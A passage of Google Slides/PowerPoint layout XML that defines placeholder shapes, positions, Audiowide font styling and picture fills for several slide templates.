              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4708753" y="1915655"/>
            <a:ext cx="2326200" cy="4845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a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2109048" y="3102807"/>
            <a:ext cx="2313300" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2109047" y="3462836"/>
            <a:ext cx="2313300" cy="4845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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Google Shape;197;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4708750" y="3102806"/>
            <a:ext cx="2326200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Google Shape;198;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4708753" y="3462836"/>
            <a:ext cx="2326200" cy="4845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a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Google Shape;199;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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200" name="Google Shape;200;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="23664" r="0" t="13299"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-142875" y="-308600"/>
            <a:ext cx="4171950" cy="2933699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="201" name="Google Shape;201;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="21334" r="0" t="3883"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-10799995">
            <a:off x="5587300" y="2451302"/>
            <a:ext cx="3747200" cy="283507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pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Google Shape;18;p3"/>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19" name="Google Shape;19;p3"/>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txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4491888" y="1682463"/>
            <a:ext cx="3312300" cy="11130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3700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>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23" name="Google Shape;23;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4491888" y="2851113"/>
            <a:ext cx="3312300" cy="60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400"/>
              <a:buNone/>
              <a:defRPr sz="16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24" name="Google Shape;24;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1931113" y="1872250"/>
            <a:ext cx="1728900" cy="11886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6000"/>
              <a:buNone/>
              <a:defRPr sz="82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pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Google Shape;25;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1015800" y="-419100"/>
            <a:ext cx="6190054" cy="3832501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Google Shape;26;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4352926" y="1967775"/>
            <a:ext cx="5790899" cy="3585375"/>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5">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="202" name="Shape 202"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="203" name="Google Shape;203;p21"/>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204" name="Google Shape;204;p21"/>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1"/>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1"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1748246"/>
            <a:ext cx="2423100" cy="426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200">
                <a:solidFill>
                  <a:schemeClr val="accen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08" name="Google Shape;208;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720204" y="2019748"/>
            <a:ext cx="24231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9" name="Google Shape;209;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3368276" y="1748246"/>
            <a:ext cx="2423100" cy="426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200">
                <a:solidFill>
                  <a:schemeClr val="accen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10" name="Google Shape;210;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3368275" y="2019748"/>
            <a:ext cx="24231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1" name="Google Shape;211;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720204" y="3237376"/>
            <a:ext cx="2423100" cy="426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200">
                <a:solidFill>
                  <a:schemeClr val="accen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12" name="Google Shape;212;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720204" y="3509446"/>
            <a:ext cx="24231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3" name="Google Shape;213;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3368276" y="3237376"/>
            <a:ext cx="2423100" cy="426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200">
                <a:solidFill>
                  <a:schemeClr val="accen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14" name="Google Shape;214;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3368275" y="3509446"/>
            <a:ext cx="24231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5" name="Google Shape;215;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6000876" y="1748246"/>
            <a:ext cx="2423100" cy="426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200">
                <a:solidFill>
                  <a:schemeClr val="accen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16" name="Google Shape;216;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6000875" y="2019748"/>
            <a:ext cx="24231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7" name="Google Shape;217;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6000876" y="3237376"/>
            <a:ext cx="2423100" cy="426900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
